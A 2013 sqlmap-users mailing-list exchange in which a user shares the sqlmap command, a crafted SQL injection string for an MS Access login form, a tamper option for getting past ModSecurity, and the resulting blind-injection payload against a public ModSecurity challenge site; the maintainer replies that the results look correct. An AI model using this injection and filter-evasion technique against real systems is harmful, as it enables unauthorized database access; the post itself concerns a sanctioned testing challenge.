Re: [sqlmap-users] Old modsecurity challange
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Old modsecurity challange
|
From: Miroslav S. <mir...@gm...> - 2013-06-01 11:47:45
|
Hi Marcell. And what makes you think that you are not getting right results? There results you've sent look quite right. Kind regards, Miroslav Stampar On Fri, May 31, 2013 at 10:34 AM, Marcell Fodor <fod...@gm...>wrote: > Heya, > > I had some time to play arround with and old medsecurity challange here: > http://www.modsecurity.org/zero.webappsecurity.com/ > > I did make this work under sqlmap: > > python ./sqlmap.py -u " > http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data > "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum" > --string "Object moved" --technique "b" --dbms "msaccess" --tamper > "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; > rv:21.0) Gecko/20100101 Firefox/21.0" > > I had to remove %0C from space2randomblank to make this work. > > Response: > > Place: (custom) POST > Parameter: #1* > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: login=asd'and(1)like(DateValue(iif(1=1 AND > 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum > -- > > Is the challange way outdated or something I do wrong? > > M > > > > > ------------------------------------------------------------------------------ > Get 100% visibility into Java/.NET code with AppDynamics Lite > It's a free troubleshooting tool designed for production > Get down to code-level detail for bottlenecks, with <2% overhead. > Download for free and get started troubleshooting in minutes. > http://p.sf.net/sfu/appdyn_d2d_ap2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
